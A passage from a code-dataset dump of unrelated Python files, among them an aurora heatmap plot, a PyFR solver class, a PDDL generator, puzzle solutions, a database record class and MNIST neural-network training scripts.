+{"seq_id":"643239666","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\n\nminvalue = 0\nmaxvalue = 3.2\ndata = []\nhours = []\ntitle = \"Dunedin Aurora No 1\"\nsavefile = \"spark_ruru.png\"\n\n\ndef convert_datetime_to_hour(datetimestring):\n    timeformat = \"%Y-%m-%d %H:%M:%S\"\n    dateobject = datetime.strptime(datetimestring, timeformat) + timedelta(hours=1)\n    hr = datetime.strftime(dateobject, \"%H:%M\")\n    return hr\n\nwith open(\"Ruru_Obs_1hrdx.csv\", \"r\") as f:\n    for line in f:\n        # each CSV row is \"<timestamp>,<value>\"; wrap the value in a\n        # one-element list so imshow() receives a 2-D array\n        dd = []\n        d = line.strip(\"\\n\")\n        d = d.split(\",\")\n        hr = d[0]\n        da = float(d[1])\n        dd.append(da)\n        hr = convert_datetime_to_hour(hr)\n        hours.append(hr)\n        data.append(dd)\nhours.reverse()\n\n# draw the heatmap\nfig, ax = plt.subplots(figsize=(3,7))\nax.set_yticks(range(len(hours)))\nax.set_yticklabels(hours)\nax.set_xticks([])\nax.set_ylabel(\"UTC Hour\")\nax.set_title(title)\n\nax.annotate('Now', xy=(0,0.5), xytext=(0.5, 0.5), color =\"white\")\nax.annotate('24 hours ago', xy=(0,23), xytext=(0.5, 23), color =\"white\")\n\nb = ax.imshow(data, cmap='viridis', interpolation=\"hanning\", vmin=minvalue, vmax=maxvalue, extent=(0,5,-0.5,23.5))\n# cbar = ax.figure.colorbar(b, ax=ax)\n# cbar_labels = ['MIN', 'MAX']\n# cbar.set_ticks([minvalue, maxvalue])\n# cbar.set_ticklabels(cbar_labels)\n\nfig.tight_layout()\nplt.savefig(savefile)\nplt.close('all')","sub_path":"dnacore03/plot_spark_ruru.py","file_name":"plot_spark_ruru.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"51426915","text":"# -*- coding: utf-8 -*-\n\nfrom pyfr.solvers.baseadvec import BaseAdvectionSystem\n\n\nclass BaseAdvectionDiffusionSystem(BaseAdvectionSystem):\n    def _gen_kernels(self):\n        super(BaseAdvectionDiffusionSystem, self)._gen_kernels()\n\n        eles = self._eles\n        int_inters = self._int_inters\n        mpi_inters = self._mpi_inters\n        bc_inters = self._bc_inters\n\n        # Element-local kernels\n        self._tgradpcoru_upts_kerns = eles.get_tgradpcoru_upts_kern()\n        self._tgradcoru_upts_kerns = eles.get_tgradcoru_upts_kern()\n        self._gradcoru_upts_kerns = eles.get_gradcoru_upts_kern()\n        self._gradcoru_fpts_kerns = eles.get_gradcoru_fpts_kern()\n\n        self._mpi_inters_vect_fpts0_pack_kerns = \\\n            mpi_inters.get_vect_fpts0_pack_kern()\n        self._mpi_inters_vect_fpts0_send_kerns = \\\n            mpi_inters.get_vect_fpts0_send_pack_kern()\n        self._mpi_inters_vect_fpts0_recv_kerns = \\\n            mpi_inters.get_vect_fpts0_recv_pack_kern()\n        self._mpi_inters_vect_fpts0_unpack_kerns = \\\n            mpi_inters.get_vect_fpts0_unpack_kern()\n\n        self._int_inters_con_u_kerns = int_inters.get_con_u_kern()\n        self._mpi_inters_con_u_kerns = mpi_inters.get_con_u_kern()\n        self._bc_inters_con_u_kerns = bc_inters.get_con_u_kern()\n\n    def _get_negdivf(self):\n        runall = self._backend.runall\n        q1, q2 = self._queues\n\n        q1 << self._disu_fpts_kerns()\n        q1 << self._mpi_inters_scal_fpts0_pack_kerns()\n        runall([q1])\n\n        q1 << self._int_inters_con_u_kerns()\n        q1 << self._bc_inters_con_u_kerns()\n        q1 << self._tgradpcoru_upts_kerns()\n\n        q2 << self._mpi_inters_scal_fpts0_send_kerns()\n        q2 << self._mpi_inters_scal_fpts0_recv_kerns()\n        q2 << self._mpi_inters_scal_fpts0_unpack_kerns()\n\n        runall([q1, q2])\n\n        q1 << self._mpi_inters_con_u_kerns()\n        q1 << self._tgradcoru_upts_kerns()\n        q1 << self._gradcoru_upts_kerns()\n        q1 << self._gradcoru_fpts_kerns()\n        q1 << self._mpi_inters_vect_fpts0_pack_kerns()\n        runall([q1])\n\n        q1 << self._tdisf_upts_kerns()\n        q1 << self._tdivtpcorf_upts_kerns()\n        q1 << self._int_inters_comm_flux_kerns()\n        q1 << self._bc_inters_comm_flux_kerns()\n\n        q2 << self._mpi_inters_vect_fpts0_send_kerns()\n        q2 << self._mpi_inters_vect_fpts0_recv_kerns()\n        q2 << 
self._mpi_inters_vect_fpts0_unpack_kerns()\n\n runall([q1, q2])\n\n q1 << self._mpi_inters_comm_flux_kerns()\n q1 << self._tdivtconf_upts_kerns()\n q1 << self._negdivconf_upts_kerns()\n runall([q1])\n","sub_path":"pyfr/solvers/baseadvecdiff/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128051662","text":"import random as r\nimport sys\n\nclass Obj():\n def __str__(self):\n return \"{}{}\".format(type(self).__name__, self.index)\n\nclass Dish(Obj):\n def __init__(self, index, ing1, ing2, ing3, neededcookingtool, cooked = False):\n self.ingrs = [ing1, ing2, ing3]\n self.cooked = cooked\n self.neededcookingtool = neededcookingtool\n self.index = index\n\nclass Locatable(Obj):\n def __init__(self, index, room):\n self.at = room\n self.index = index\n\nclass Movable(Locatable):\n def __init__(self, index, room, equipped = False):\n super().__init__(index, room)\n self.equipped = equipped\n\nclass Ingredient(Movable):\n pass\n\nclass Tool(Movable):\n pass\n\nclass Plant(Locatable):\n def __init__(self, index, room, gardened = False):\n super().__init__(index, room)\n self.gardened = gardened\n\nclass CookingTool(Tool):\n def __init__(self, index, room, equipped = False, washed = False):\n super().__init__(index, room, equipped)\n self.washed = washed\n\nclass CleaningTool(Tool):\n pass\n\nclass GardeningTool(Tool):\n pass\n\nclass Room(Obj):\n def __init__(self, index, position = False, nextroom = None):\n self.position = position\n self.nextroom = nextroom \n self.index = index\n\n\ndef createobjects(ndishes, ningr, nrooms, nplants, ncookingtools, ncleaningtools, ngardeningtools):\n ningr = max(3 * ndishes, ningr)\n \n dishes = []\n ingredients = []\n rooms = []\n cookingtools = []\n cleaningtools = []\n gardeningtools = []\n plants = []\n\n # Rooms\n for i in range(nrooms):\n if i > 0: rooms.append(Room(i,nextroom=i - 1))\n else: rooms.append(Room(i))\n\n rooms[0].nextroom = nrooms - 1\n rooms[r.randint(0, nrooms - 1)].position = True\n\n # Tools\n for i in range(max(ncookingtools, ncleaningtools, ngardeningtools)):\n if i < ncookingtools: cookingtools.append(CookingTool(i, r.randint(0, nrooms-1)))\n if i < ncleaningtools: cleaningtools.append(CleaningTool(i,r.randint(0, nrooms-1)))\n if i < ngardeningtools: gardeningtools.append(GardeningTool(i,r.randint(0, nrooms-1)))\n\n j = 0\n # Ingredients and dishes\n for i in range(ningr):\n ingredients.append(Ingredient(i, r.randint(0, nrooms-1)))\n if i % 3 == 2 and j < ndishes:\n dishes.append(Dish(j, i, i-1, i-2, r.randint(0, ncookingtools - 1)))\n j += 1\n\n # Plants\n for i in range(nplants):\n plants.append(Plant(i, r.randint(0, nrooms-1)))\n\n return [dishes, ingredients, rooms, cookingtools, cleaningtools, gardeningtools, plants]\n\ndef createpredicates(objects):\n # dishes = objects[0]\n # ingredients = objects[1]\n # rooms = objects[2]\n # cookingtools = objects[3]\n # cleaningtools = objects[4]\n # gardeningtools = objects[5]\n # plants = objects[6]\n\n predicates = []\n vect = [x for sublist in objects for x in sublist]\n\n for i in vect:\n if isinstance(i, Locatable):\n predicates.append(\"(at {} Room{})\".format(str(i), str(i.at)))\n \n if isinstance(i, Dish):\n predicates.append(\"(ingr1 Ingredient{} {})\".format(i.ingrs[0], str(i)))\n predicates.append(\"(ingr2 Ingredient{} {})\".format(i.ingrs[1], str(i)))\n predicates.append(\"(ingr3 Ingredient{} {})\".format(i.ingrs[2], str(i)))\n 
predicates.append(\"(needed CookingTool{} {})\".format(i.neededcookingtool, str(i)))\n\n if isinstance(i, Room):\n predicates.append(\"(connected {} Room{})\".format(str(i), i.nextroom))\n if i.position:\n predicates.append(\"(position {})\".format(str(i)))\n \n predicates.append(\"(handfree)\")\n\n return predicates\n\ndef creategoals(objects, mode, task=[\"cook\"]):\n goals = []\n\n if \"cook\" in task:\n # Select a random assortment of dishes that must be cooked at the end\n dishes = objects[0]\n cookingtools = objects[3]\n mustclean = r.randint(0, 1) == 0\n\n mustcook = r.sample(dishes, r.randint(1, len(dishes)))\n\n for d in mustcook:\n goals.append(\"(cooked {})\".format(str(d)))\n \n if mustclean or mode == \"train\":\n for i in cookingtools:\n goals.append(\"(washed {})\".format(str(i)))\n \n if \"clean\" in task:\n # Select a random assortment of rooms that must be clean at the end\n rooms = objects[2]\n\n toclean = r.sample(rooms, r.randint(1, len(rooms)))\n\n for i in toclean:\n goals.append(\"(clean {})\".format(str(i)))\n\n if \"garden\" in task:\n #Select a random assortment of plants that must be gardened\n plants = objects[6]\n\n togarden = r.sample(plants, r.randint(1, len(plants)))\n\n for i in togarden:\n goals.append(\"(gardened {})\".format(str(i)))\n\n return goals\n\n\nnproblems = int(sys.argv[1])\nmode = sys.argv[2]\n\nfor p in range(nproblems):\n\n # ndishes = 2\n # nrooms = 4\n # nplants = 3\n # ncookingtools = 2\n # ncleaningtools = 1\n # ngardeningtools = 3\n\n if mode == \"train\":\n ndishes = r.randint(2,4)\n ningr = r.randint(ndishes * 3, ndishes * 4)\n nrooms = r.randint(3,5)\n nplants = r.randint(2,5)\n ncookingtools = r.randint(2,4)\n ncleaningtools = r.randint(1,3)\n ngardeningtools = r.randint(1,3)\n else:\n ndishes = r.randint(20, 30)\n ningr = r.randint(ndishes * 3, ndishes * 4)\n nrooms = r.randint(30, 50)\n nplants = r.randint(30, 50)\n ncookingtools = r.randint(10, 15)\n ncleaningtools = r.randint(10, 15)\n ngardeningtools = r.randint(10, 15)\n\n objects = createobjects(ndishes, ningr, nrooms, nplants, ncookingtools, ncleaningtools, ngardeningtools)\n predicates = createpredicates(objects)\n \n if mode == \"train\": ntasks = r.randint(2,3)\n else: ntasks = r.randint(1,2)\n\n tasks = [\"cook\", \"clean\", \"garden\"]\n \n goals = creategoals(objects, mode, r.choices(tasks, k=ntasks))\n\n with open(\"p{}.pddl\".format(p), \"w+\") as f:\n f.write(\"(define (problem multitasking{})\\n\\t(:domain multitasking)\\n\\t(:objects\\n\".format(str(p)))\n\n for typ in objects:\n f.write(\"\\t\\t\")\n for o in typ:\n f.write(str(o) + \" \")\n f.write(\" - {}\\n\".format(type(typ[0]).__name__.lower()))\n \n f.write(\")\\n\\t(:init\\n\")\n\n for p in predicates:\n f.write(\"\\t\\t{}\\n\".format(p))\n \n f.write(\"\\t)\\n\\t(:goal (and\\n\")\n\n for g in goals:\n f.write(\"\\t\\t{}\\n\".format(g))\n f.write(\"\\t))\\n)\")\n\n\n","sub_path":"generators/multitasking/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139875791","text":"# 조이스틱으로 알파벳 이름을 완성하세요. 
+{"seq_id":"139875791","text":"# Complete the alphabet name with the joystick. At the start the name consists only of A's.\n# e.g. if the name to complete has three letters it starts as AAA, four letters as AAAA\n\n# Moving the joystick in each direction does the following:\n\n# ▲ - next letter\n# ▼ - previous letter (moving down from A wraps around to Z)\n# ◀ - move the cursor left (moving left from the first position puts the cursor on the last character)\n# ▶ - move the cursor right\n# For example, \"JAZ\" can be made as follows.\n\n# - At the first position, push the joystick up 9 times to complete J.\n# - Push the joystick left once to move the cursor to the last character.\n# - At the last position, push the joystick down once to complete Z.\n# So \"JAZ\" can be made with 11 moves, and this is the minimum.\n# Given the target name as the parameter name, write a solution function that returns the minimum number of joystick moves for that name.\n\n# Constraints\n# name consists only of uppercase letters.\n# The length of name is between 1 and 20.\n# Examples\n# name\treturn\n# \"JEROEN\"\t56\n# \"JAN\" 23\n\n\n# 1. First, implement the direction keys.\n# ▲ - next letter\n# ▼ - previous letter (moving down from A wraps around to Z)\n# ◀ - move the cursor left (moving left from the first position puts the cursor on the last character)\n# ▶ - move the cursor right\n# For example, \"JAZ\" can be made as follows.\n\nname = 'JEROEN'\n\n\ndef solution(name):\n    joy = []\n    answer = 0\n    # add up the up/down cost of each letter\n    for i in range(len(name)):\n        if name[i]=='A':\n            continue\n        else:\n            joy.append(i)\n            temp = ord(name[i])-ord('A')\n            print(temp) # 8 4 17 14 4 13\n            if temp>13: # we want the optimum, so past the halfway point of the 26 letters (13) search backwards instead\n                answer += 26-temp\n                # print(answer) # 22, 34 \n            else:\n                answer += temp\n                # print(answer) # 9, 13 ,38, 51\n    # now greedily pick the next position based on the indices\n    current = 0\n    for i in range(len(joy)):\n        move_list = [abs(x-current) if abs(x-current)<=len(name)/2 else len(name)-abs(x-current) for x in joy]\n        print(move_list)\n        answer += min(move_list)\n        current = joy.pop(move_list.index(min(move_list)))\n    return answer\n\nsolution(name)","sub_path":"프로그래머스/조이스틱.py","file_name":"조이스틱.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
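The record above prices each letter at `min(d, 26 - d)` up/down presses, where `d = ord(ch) - ord('A')`, before adding greedy cursor moves. A tiny check of that letter-cost piece against the numbers quoted in the problem statement:

```python
def letter_cost(ch: str) -> int:
    # Go forward d steps, or wrap backwards 26 - d steps, whichever is shorter.
    d = ord(ch) - ord("A")
    return min(d, 26 - d)

# "JAZ": J costs 9, A costs 0, Z costs 1 -> 10; plus one cursor move = 11
assert sum(letter_cost(c) for c in "JAZ") == 10
# "JAN": 9 + 0 + 13 = 22; plus one cursor move = 23
assert sum(letter_cost(c) for c in "JAN") == 22
```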
+{"seq_id":"138154982","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Schooner - Course Management System\n# University of Turku / Faculty of Technology / Department of Computing\n# (c) 2021, Jani Tammi \n#\n# Submission.py - Data dictionary class for core.submission\n# 2021-08-27  Initial version.\n# 2021-09-03  Updated to more flexible version with .db_update().\n#\n\nclass Submission(dict):\n    def __init__(self, cursor, submission_id: int = None):\n        self.cursor = cursor\n        # Primary key is whatever are the call parameters, minus the first two\n        self.pkkeys = [k for k in locals().keys() if k not in ('self', 'cursor')]\n        self.pkvals = locals() # to avoid KeyError while being used inside comprehensions\n        self.pkvals = [self.pkvals[k] for k in self.pkkeys]\n        SQL = f\"SELECT * FROM core.{self.__class__.__name__} WHERE \"\n        if all(self.pkvals):\n            SQL += \" AND \".join([f\"{pk}=%({pk})s\" for pk in self.pkkeys])\n        else:\n            SQL += \"false\"\n        if cursor.execute(SQL, locals()).rowcount:\n            self.update(\n                dict(\n                    zip(\n                        [key[0] for key in cursor.description],\n                        cursor.fetchone()\n                    )\n                )\n            )\n        elif all([v is None for v in self.pkvals]):\n            # (all) PKs are None -> Create empty dict\n            self.update(\n                dict(\n                    zip(\n                        [key[0] for key in cursor.description],\n                        [None] * len(cursor.description)\n                    )\n                )\n            )\n        else:\n            raise ValueError(\n                f\"{self.__class__.__name__} (\" +\n                \", \".join(f\"'{v}'\" for v in self.pkvals) +\n                \") not found!\"\n            )\n\n\n    def db_update(self, commit: bool = True) -> None:\n        \"\"\"Update database table to match. (Will not INSERT).\"\"\"\n        issues = []\n        for k in self.pkkeys:\n            if not self[k]:\n                issues.append(k)\n        if issues:\n            raise ValueError(\n                f\"Primary key value(s) ({', '.join(issues)}) have NULL values!\"\n            )\n        SQL = f\"UPDATE core.{self.__class__.__name__} SET \"\n        SQL += \", \".join([f\"{k}=%({k})s\" for k in self.keys() if k not in self.pkkeys])\n        SQL += \" WHERE \"\n        SQL += \" AND \".join([f\"{pk}=%({pk})s\" for pk in self.pkkeys])\n        if not self.cursor.execute(SQL, self).rowcount:\n            raise Exception(\n                f\"Unable to UPDATE {self.__class__.__name__} (\" +\n                \", \".join(f\"'{self[k]}'\" for k in self.pkkeys) + \")!\"\n            )\n        if commit:\n            self.cursor.connection.commit()\n\n\n\n# EOF\n","sub_path":"schooner/db/core/Submission.py","file_name":"Submission.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"466039942","text":"# A Bingo card consists of 5 columns of 5 numbers which are labelled with the letters B, I, N, G and O.\n\n# There are 15 numbers that can appear under each letter.\n\n# In particular, the numbers that can appear under the B range from 1 to 15,\n# the numbers that can appear under the I range from 16 to 30,\n# the numbers that can appear under the N range from 31 to 45, and so on.\n\n# Write a function that creates a random Bingo card and stores it in a dictionary.\n\n# The keys will be the letters B, I, N, G and O. The values will be the lists of five numbers that appear under each letter.\n# Write a second function that displays the Bingo card with the columns labelled appropriately.\n\n# Use these functions to write a program that displays a random Bingo card.\n\n# Ensure that the main program only runs when the file containing your solution has not been imported into another program.\n\nimport random\n\nbingo_card = {}\n\ndef generateCard(c):\n    # range() excludes its stop value, so use 16/31/46/61/76 to cover 1-15, 16-30, ...\n    c[\"B\"] = random.sample(range(1, 16), 5)\n    c[\"I\"] = random.sample(range(16, 31), 5)\n    c[\"N\"] = random.sample(range(31, 46), 5)\n    c[\"G\"] = random.sample(range(46, 61), 5)\n    c[\"O\"] = random.sample(range(61, 76), 5)\n\n    return c\n\nif __name__ == \"__main__\":\n    # run only when executed directly, as the exercise requires\n    print(generateCard(bingo_card))\n","sub_path":"M2/024-create-a-bingo-card/024-create-a-bingo-card.py","file_name":"024-create-a-bingo-card.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
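The bingo record stops after `generateCard`, although its own problem statement also asks for a function that displays the card with labelled columns. A minimal sketch of that missing display step; the column width and function name are my choices, not the exercise's:

```python
def displayCard(card: dict) -> None:
    # Print the B I N G O header, then the card row by row.
    letters = "BINGO"
    print(" ".join("{:>3}".format(ch) for ch in letters))
    for row in range(5):
        print(" ".join("{:>3}".format(card[ch][row]) for ch in letters))
```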
+{"seq_id":"97782944","text":"#!/usr/bin/env python3\n\nfrom src.day9 import boost_program as boost\n\n'''\nThe springdroid will move forward automatically, constantly thinking about whether to jump. \nThe springscript program defines the logic for this decision.\n\nTwo registers are available: T, the temporary value register, and J, the jump register. \nIf the jump register is true at the end of the springscript program, the springdroid will try to jump. \nBoth of these registers start with the value false.\n\nthey have a sensor that can detect whether there is ground at various distances in the direction it is facing; \nthese values are provided in read-only registers\n\nour springdroid can detect ground at four distances: one tile away (A), two tiles away (B), \nthree tiles away (C), and four tiles away (D). If there is ground at the given distance, \nthe register will be true; if there is a hole, the register will be false.\n\nAND X Y sets Y to true if both X and Y are true; otherwise, it sets Y to false.\nOR X Y sets Y to true if at least one of X or Y is true; otherwise, it sets Y to false.\nNOT X Y sets Y to true if X is false; otherwise, it sets Y to false.\n\nFor example, the one-instruction program NOT A J means \"if the tile immediately in front of me is not ground, jump\".\n'''\n\n\ndef instructions_to_ascii(instructions):\n    # ord() already returns the integer code point of each character\n    return [ord(ch) for ch in instructions]\n\n\ndef get_input(_):\n    input = 'NOT C J\\n' \\\n            'NOT B T\\n' \\\n            'OR T J\\n' \\\n            'NOT A T\\n' \\\n            'OR T J\\n' \\\n            'AND D J\\n' \\\n            'WALK\\n'\n    return instructions_to_ascii(input)\n\n\nif __name__ == '__main__':\n    with open('input', 'r') as file:\n        first_line = file.readlines()[0]\n    input = list(map(int, first_line.split(\",\")))\n    runner = boost.BoostProgram(input, [], get_input, False, True)\n    output = runner.run()\n\n","sub_path":"src/day21/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"239680792","text":"from keras import models\nfrom keras import layers\nfrom keras import losses\nfrom keras import optimizers\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# <============PLOTING============>#\n\n\ndef ploting():\n    loss = history.history['loss']\n    val_loss = history.history['val_loss']\n    acc = history.history['acc']\n    val_acc = history.history['val_acc']\n    epochs = range(1, len(loss) + 1)\n    fig = plt.figure()\n    ax1 = fig.add_subplot(2, 1, 1)\n    ax2 = fig.add_subplot(2, 1, 2)\n    ax1.plot(epochs, loss, 'bo', label='Training loss')\n    ax1.plot(epochs, val_loss, 'b', label='Validation loss', color='r')\n    ax1.set_title('Training and validation loss')\n    ax1.set_xlabel('Epochs')\n    ax1.set_ylabel('Loss')\n    ax1.legend()\n    ax2.plot(epochs, acc, 'bo', label='Training acc')\n    ax2.plot(epochs, val_acc, 'b', label='Validation acc', color='r')\n    ax2.set_title('Training and validation accuracy')\n    ax2.set_xlabel('Epochs')\n    ax2.set_ylabel('Accuracy')\n    ax2.legend()\n    for ax in fig.axes:\n        ax.grid(True)\n    plt.show()\n\n\n# <============DATASET============>#\n\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_images = train_images.reshape((60000, 28, 28, 1))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, 28, 28, 1))\ntest_images = test_images.astype('float32') / 255\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n\n# <============CREATE MODEL============>#\n\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu',\n                        input_shape=(28, 28, 1)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\nprint(model.summary())\n\n\n# <============COMPILE MODEL============>#\n\n\n'''\n# test_acc: 0.9914000034332275\nmodel.compile(optimizer='rmsprop',\n              loss='mse',\n              metrics=['acc'],\n              loss_weights=None,\n              sample_weight_mode=None,\n              weighted_metrics=None,\n              
target_tensors=None)\n'''\n\n# test_acc: 0.9886999726295471\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['acc'],\n loss_weights=None,\n sample_weight_mode=None,\n weighted_metrics=None,\n target_tensors=None)\n\n\n''' <============SAME_RESULT============>\nmodel.compile(optimizer=optimizers.RMSprop(lr=0.001),\n loss='mse',\n metrics=['acc'])\n'''\n\n\n# <============TRAINING============>#\n\n\nhistory = model.fit(x=train_images,\n y=train_labels,\n batch_size=128,\n epochs=5,\n verbose=1,\n callbacks=None,\n validation_split=0.0,\n validation_data=(test_images, test_labels),\n shuffle=True,\n class_weight=None,\n sample_weight=None,\n initial_epoch=0,\n steps_per_epoch=None,\n validation_steps=None,\n validation_freq=1,\n max_queue_size=10,\n workers=1,\n use_multiprocessing=False)\n\n\n# <============RESULT FOR TEST DATA============>#\n\n\ntest_loss, test_acc = model.evaluate(x=test_images,\n y=test_labels,\n batch_size=None,\n verbose=1,\n sample_weight=None,\n steps=None,\n callbacks=None,\n max_queue_size=10,\n workers=1,\n use_multiprocessing=False)\n\n\n''' Prediction'''\n\nprint((model.predict(train_images[0:1, :, :, :])))\n\n\n# <============PRINT============>#\n\n\nprint(f'test_acc: {test_acc}\\ntest_loss: {test_loss}')\nploting()\n\n\n","sub_path":"beginner/Digits/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279780327","text":"from neuron_network import NeuronNetwork, Optimalisation, Initialisation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gzip\nimport pickle\nimport time\nimport random\n\nf = gzip.open('mnist.pkl.gz', 'rb')\ntraining_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\nf.close()\n\ntt, vt = training_data\nprint(np.shape(tt))\n# tt = tt[:1000, :]\n# vt = vt[:1000]\n\ntv, vv = validation_data\nprint(np.shape(tv))\n# tv = tv[:100, :]\n# vv = vv[:100]\n# print(np.shape(t), np.shape(v))\n\n# print(training_data)\n# print(np.shape(validation_data))\n# print(np.shape(test_data))\n\nlayers_sig = [\n (6272, 128),\n # (60, 30),\n (128, 10)\n\n]\n\n\nlayers_relu = [\n (6272, 128),\n # (40, 20),\n (128, 10)\n]\n\ndef relu(x):\n return np.maximum(x, 0)\n\ndef relu_derivative(x):\n return 1. 
* (x > 0)\n\n\ndef sigmoid(x):\n    return 1.0/(1.0+np.exp(-x))\n\n\ndef sigmoid_prime(x):\n    return sigmoid(x)*(1-sigmoid(x))\n\n# a tuple (f, f'), matching sigmoid_activation_function below;\n# the original used a set literal, which would lose the ordering\nrelu_activation_function = (\n    lambda x: relu(x),\n    lambda x: relu_derivative(x)\n)\n\nsigmoid_activation_function = (\n    lambda x: sigmoid(x),\n    lambda x: sigmoid_prime(x)\n)\n\nnet_relu = NeuronNetwork(\n    layers_relu,\n    0.01,\n    relu_activation_function,\n    momentum=0.1,\n    adadelta_y=0.9,\n    negative=True,\n    soft_max_output=True,\n    optimalisation=Optimalisation.MOMENTUM,\n    initialisation=Initialisation.RANDOM\n)\n\nnet_sigmoid = NeuronNetwork(\n    layers_sig,\n    0.1,\n    sigmoid_activation_function,\n    momentum=0.1,\n    adadelta_y=0.9,\n    negative=True,\n    soft_max_output=True,\n    optimalisation=Optimalisation.MOMENTUM,\n    initialisation=Initialisation.RANDOM\n)\n\n# def singular_run():\n#\n#     print(np.shape(tt), np.shape(vt))\n#\n#     start = time.time()\n#     nn.train(tt, vt, 3, 200, 0.05)\n#     print(round((time.time()-start)*100)/100, \"s\")\n#\n#     start = time.time()\n#     nn.test(tv, vv)\n#     print(round((time.time()-start)*100)/100, \"s\")\n#\n#     index = random.randint(0, len(tv))\n#     print(\"Predictions for: \", nn.predict(tv[index]))\n#\n#     plt.imshow(np.resize(tv[index], (28, 28)))\n#     plt.show()\n# singular_run()\n\ndef plot_run():\n    data_for_plot = []\n    data_for_plot2 = []\n    for i in range(0, 1):\n        print(\"Epoch: \", i)\n        net_relu.train(tt, vt, 1, 100, 0.01)\n        data_for_plot.append(net_relu.test(tv, vv))\n        # net_sigmoid.train(tt, vt, 1, 100, 0.1)\n        # data_for_plot2.append(net_sigmoid.test(tv, vv))\n    plt.plot(data_for_plot, 'b', marker='o', label='Relu')\n    plt.plot(data_for_plot2, 'r', marker='o', label='Sigmoid')\n    plt.legend(loc='lower right')\n    plt.suptitle('Model accuracy (percent) in each epoch')\n    plt.xlabel(\"Epoch number\")\n    plt.ylabel(\"Model accuracy percentage\")\n    # plt.xticks(np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]), [1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n    plt.yticks(np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]),\n               ['0%', '10%', '20%', '30%', '40%', '50%', '60%', '70%', '80%', '90%', '100%'])\n    plt.savefig('wykres1')\n    plt.show()\n\nplot_run()\n\n# print(np.array([1,4,1,2,5,6])*np.array([2,1,4,6])[:, np.newaxis])\n#\n#\n# inp = np.array([\n#     [1, 0, 0],\n#     [0, 1, 1],\n# ])\n#\n# neur = np.array([\n#     [10, 2, 2, 2],\n#     [10, 3, 3, 3]\n# ])\n#\n\n# print(np.tile(inp[0], (neur.shape[0], 1)))\n# print(neur[:, 0])\n# print(np.sum(np.tile(inp[0], (neur.shape[0], 1))*neur[:, 1:], axis=1)+neur[:, 0])\n# print(np.sum(inp[0]*neur[:, 1:], axis=1)+neur[:, 0])\n\n# delta = np.array([\n#     1,2,3,4,5\n# ])\n#\n# prime = np.array([\n#     0,0,1,0,0,1,0\n# ])\n#\n# layers = np.array([\n#     [1, 0, 0, 0, 0],\n#     [1, 1, 0, 0, 0],\n#     [1, 0, 1, 0, 0],\n#     [1, 0, 0, 1, 0],\n#     [1, 0, 0, 0, 1],\n#     [1, 0, 0, 1, 0],\n#     [1, 0, 1, 0, 0],\n# ])\n\n\n#\n# print(\n#     np.array([\n#         [1,1,2,3,5,2,3,5,2],\n#         [1,3,2,3,4,6,2,1,2],\n#         [2,4,2,5,6,2,6,7,2]\n#     ]).T *\n#     np.array([1,0,1])\n# )\n#\n#\n# print(\n#     np.sum(\n#         np.array([\n#             [1,1,2,3,5,2,3,5,2],\n#             [1,3,2,3,4,6,2,1,2],\n#             [2,4,2,5,6,2,6,7,2]\n#         ]).T *\n#         np.array([1,0,1]), axis=1)\n# )\n\n# print(layers*prime[:, np.newaxis])\n# print(layers*delta)\n#\n# print(np.array([1,0,0,0])*np.array([2,2,2,2]))\n#\n# print(np.shape(layers), np.shape(delta))\n# print(np.sum(layers*delta, axis=1))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"316119956","text":"from django.conf.urls import include, url\nfrom 
